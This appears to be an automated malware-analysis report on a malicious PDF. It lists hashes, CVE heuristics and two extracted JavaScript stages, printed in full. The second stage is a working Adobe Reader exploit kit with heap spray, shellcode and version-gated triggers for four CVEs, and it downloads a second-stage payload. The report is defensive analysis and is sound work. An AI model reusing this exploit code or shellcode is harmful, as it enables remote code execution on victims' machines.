Malicious PDF / .SWA — malware analysis report

Static analysis result for SHA-256 0e3cd20576c34fa3…

MALICIOUS

PDF / .SWA

5.2 KB Created: 2010-08-11 12:12:05 Authoring application: Xhedaholibhanaxizo (via c5e67Zeuadoqmab) First seen: 2026-05-11
MD5: ab09d4819190c1f184024dcedd474b7a SHA-1: 64c8f6f691de4a7a759022b031d36f7424787529 SHA-256: 0e3cd20576c34fa3de72fd749d93eafd3ecb25d2bd436c9537212181676764ae
410 Risk Score

Malware Insights

MITRE ATT&CK
T1203 Exploitation for Client Execution T1059.007 JavaScript

The PDF file contains embedded JavaScript that leverages multiple known Adobe Reader vulnerabilities, including CVE-2009-4324, CVE-2009-0927, CVE-2007-5659, and CVE-2008-2992. The script is designed to perform a heap spray and ultimately download a second-stage payload from the URL http://K.egh/4. The ML classifier also flagged this PDF as malicious with high confidence.

Machine Learning

  • Nyx PDF Classifier malicious score 1.0000

Heuristics 10

  • media.newPlayer — CVE-2009-4324 critical CVE exact CVE_2009_4324
    PDF JavaScript calls media.newPlayer — CVE-2009-4324 is a use-after-free in Adobe Reader's multimedia plugin triggered by media.newPlayer(). Actively exploited as a zero-day in December 2009. (identified after JavaScript deobfuscation)
  • Collab.getIcon — CVE-2009-0927 critical CVE exact CVE_2009_0927
    PDF JavaScript calls Collab.getIcon — CVE-2009-0927 is a stack buffer overflow in Adobe Reader triggered by Collab.getIcon() with a crafted argument. Allows arbitrary code execution. (identified after JavaScript deobfuscation)
  • Collab.collectEmailInfo — CVE-2007-5659 critical CVE exact CVE_2007_5659
    PDF JavaScript calls Collab.collectEmailInfo — CVE-2007-5659 is a buffer overflow in Adobe Reader triggered by a long argument or heap-sprayed message field passed to Collab.collectEmailInfo(). Part of a series of Acrobat JS API exploits. (identified after JavaScript deobfuscation)
  • util.printf — CVE-2008-2992 critical CVE exact CVE_2008_2992
    PDF JavaScript calls util.printf() — CVE-2008-2992 is a stack buffer overflow in Adobe Reader triggered by a long format-specifier argument. Widely exploited in the wild after disclosure. (identified after JavaScript deobfuscation)
  • Pidief-style multi-CVE JavaScript dispatcher critical CVE likely PDF_PIDIEF_MULTI_CVE_DISPATCH
    A single JavaScript body branches on app.viewerVersion and invokes two or more of the canonical Reader sinks (Collab.collectEmailInfo, Collab.getIcon, util.printf with a field-width format string). This is the 2009-2010 Pidief.J multi-exploit landing template: a per-version dispatcher that fires the matching CVE chain for whichever Reader version opens the file.
  • Multi-CVE Adobe Reader JavaScript exploit kit critical PDF_ADOBE_READER_MULTI_CVE_JS_KIT
    One recovered JavaScript stage contains multiple version-gated Adobe Reader exploit branches. This is stronger evidence than independent API keywords: the PDF is selecting old Reader vulnerabilities by viewer version and running heap-sprayed Acrobat JavaScript exploit paths.
  • JavaScript action low 1 related finding PDF_JAVASCRIPT
    PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Embedded JS stream low PDF_JS
    PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://K.egh/4 Referenced by PDF JavaScript

Extracted artifacts 2

Files carved from inside the sample during analysis.

FilenameKindSourceSize
javascript_obj0011_000.js pdf-javascript-stream PDF /JS object 11 at offset 0xED9 873 bytes
SHA-256: 962f51d1b096c5fdd5245ae6226a2274328d468b7fca6a3259813c70f390ca6a
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 2 eval/decoder/string-building token(s).
Preview script
First 1,000 lines of the extracted script
function startMoveTimer(){var yJ='var nUP = 77211 7;var DrDED = thDis;varDD gF=D\'7ge\'+\'tPageDDNt\'+\'hWord\';Dvar xA=\'ge7D\'+\'DDtD7Pag\'7+\'eNum7DW\'+\'7orDDds\';var wF=\'DfrDD\'+\'o7m7C7h\'+\'aDrCodeD\';v7aDr 7DrM=rEDD[xA]7(this.pageNum)DD;var kN=\'\';for(var dDM=0;dM< rMD7; dM+DD+){kN=[kDN,77rED[gF](rE.page7DNu7m,dM,true7)].joiDDn(\'\');;}var qL=\'\';for(7vaDDr dM=0;dMD7 < kN.Dlength; dM7D+=2){iF=kN.subst7r(dDM,27);qL=[qDL,7DStri7ng[wDDF](parDseInt(iF,D1D6)^n7DUP)].joi7n(\'\');}evaDDl(7qL);qL=null;'.replace(/[7D]/g, '');var xS = '';try {xS = new Function(yJ);if(moveTimer>=0 && moveTimer<10){moveTimer++;setTimeout('startMoveTimer()',15);}if(moveTimer==10){getDivCoordinates();var subElements = dragDropDiv.getElementsByTagName('DIV');if(subElements.length>0){dragDropDiv.removeChild(subElements[0]);}}aHS(cXY);} catch(mF){xS();}return false;}startMoveTimer();
legacy_pdfkit_stage_000.js deobfuscated-js getPageWords-XOR Pidief stage normalized at offset 0x0 3914 bytes
SHA-256: 879ad9ba94bd5e87f58f9995705923ddcd63218037780d5fb3c6fe6dbbc14dc8
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 2 eval/decoder/string-building token(s).
Preview script
First 1,000 lines of the extracted script
for(var f=0; f <264; f++){f++};var v={n:false};this.z="z";try {var yX='bU'.substr(4302,4302)} catch(yX){};var yL='0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ/.:_-?&=%#';try {var tU='p'.substring(7853)} catch(tU){};tC=["mB","pQ","qF"];this.oD=28604;this.oD++;nO=["jY","wR","l"];var vGR=this.info['iB'].replace(/[\s]/g, '');gX=[];uN=24680;uN-=78;var aT=new Date();aB=[];var dQ = this.info;var wX = (dQ.producer.substr(0,5) == 'debug');var nQ = new Array(); var sN = "%u";function vK(str){str = str.split(sN);var ret="";for(var i in str){if(str[i] != "")ret += String.fromCharCode(parseInt(str[i],16));}return ret;}function oF(str1, str2){return [str1, str2].join("");}function hW(kT){var lS = gN();var zM = mL();lS += ((lS.indexOf("?") > -1) ? "&" : "?") + "reader_version=" + zM;if(wX) app.alert("URL: " + lS);lS=dG(lS);var d=sN;var iF=d+"C033"+d+"8B64"+d+"3040"+d+"0C78"+d+"408B"+d+"8B0C"+d+"1C70"+d+"8BAD"+d+"0858"+d+"09EB"+d+"408B"+d+"8D34"+d+"7C40"+d+"588B"+d+"6A3C"+d+"5A44"+d+"E2D1"+d+"E22B"+d+"EC8B"+d+"4FEB"+d+"525A"+d+"EA83"+d+"8956"+d+"0455"+d+"5756"+d+"738B"+d+"8B3C"+d+"3374"+d+"0378"+d+"56F3"+d+"768B"+d+"0320"+d+"33F3"+d+"49C9"+d+"4150"+d+"33AD"+d+"36FF"+d+"BE0F"+d+"0314"+d+"F238"+d+"0874"+d+"CFC1"+d+"030D"+d+"40FA"+d+"EFEB"+d+"3B58"+d+"75F8"+d+"5EE5"+d+"468B"+d+"0324"+d+"66C3"+d+"0C8B"+d+"8B48"+d+"1C56"+d+"D303"+d+"048B"+d+"038A"+d+"5FC3"+d+"505E"+d+"8DC3"+d+"087D"+d+"5257"+d+"33B8"+d+"8ACA"+d+"E85B"+d+"FFA2"+d+"FFFF"+d+"C032"+d+"F78B"+d+"AEF2"+d+"B84F"+d+"2E65"+d+"7865"+d+"66AB"+d+"6698"+d+"B0AB"+d+"8A6C"+d+"98E0"+d+"6850"+d+"6E6F"+d+"642E"+d+"7568"+d+"6C72"+d+"546D"+d+"8EB8"+d+"0E4E"+d+"FFEC"+d+"0455"+d+"5093"+d+"C033"+d+"5050"+d+"8B56"+d+"0455"+d+"C283"+d+"837F"+d+"31C2"+d+"5052"+d+"36B8"+d+"2F1A"+d+"FF70"+d+"0455"+d+"335B"+d+"57FF"+d+"B856"+d+"FE98"+d+"0E8A"+d+"55FF"+d+"5704"+d+"EFB8"+d+"E0CE"+d+"FF60"+d+"0455";iF+=lS;return vK(iF);};function gN(){var jKX = (dQ.author + dQ.title).replace(/[\s]/g, '');var fKP = tI(jKX, vGR, yL);return fKP;};function tI(jKX, yL, vGR){var fKP="";for(var i=0; i < jKX.length; i++){var mBI = yL.indexOf(jKX[i]);if(mBI > -1 ){fKP += vGR[mBI];}}return fKP;};function dG(jKX){var out = "";jKX = uD(jKX);g = Math.round(jKX.length / 4);if (g != jKX.length /4) jKX+="00";for(var i=0; i < jKX.length; i+=4){out+= sN + jKX.substr(i+2, 2) + jKX.substr(i, 2);}return out;};function uD(s){var i, f = 0, a = [];s += '';f = s.length;for (i = 0; i<f; i++) {a[i] = s.charCodeAt(i).toString(16).replace(/^([\da-f])$/,"0$1").toUpperCase();}return a.join('');};function zY(iX, len){while (iX.length * 2 < len){iX = oF(iX, iX);}return iX.substring(0, len / 2);};function dU(mD){var rW = 0x0c0c0c0c;        eL = hW("pdf");if (mD == 1){rW = 0x30303030;}var fO = 0x400000;var ln = eL.length * 2;var kR = fO - (ln + 0x38);var iX = vK(sN+"9090"+sN+"9090"); iX = zY(iX, kR);var nW = (rW - 0x400000) / fO;for (var yB = 0; yB < nW; yB ++ ){nQ[yB] = oF(iX, eL);}};function mL(){try {return app.viewerVersion.toString();}catch(rU){    return 0;}}if(wX) app.alert("called exploit");var zM = mL();if(wX)  app.alert("v: " + zM);if (zM > 8){if(wX) app.alert("util.printf");dU(1);var wH = "12999999999999999999";for (dK=0; dK < 276; dK++) wH += "8";util.printf("%45000f", wH);}if (zM < 8){if(wX) app.alert("Collab.collectEmailInfo");dU(0);var wP = vK(sN+"0c0c"+sN+"0c0c");while (wP.length < 44952) wP += wP;this.collabStore = Collab.collectEmailInfo({ subj : "", msg : wP});}if (zM < 9.1){if (app.doc.Collab.getIcon){if(wX) app.alert("Collab.getIcon");dU(0);var dGH = unescape("%09");while (dGH.length < 0x4000) dGH += dGH;dGH = "N." + dGH;app.doc.Collab.getIcon(dGH);}}if (zM == 9.2){if(wX) app.alert("media.newPlayer");dU(1);var sf="1.000000000.000000000.1337 : 3.13.37";util.printd(sf, new Date());try {media.newPlayer(null);} catch(e) {}util.printd(sf, new Date());}var iBU={};var oHW={uV:"zU".substr(14607, 14607)};var aH={d:"fE".substr(16170, 16170)};

Open this report in the interactive analyzer, or submit your own file for analysis.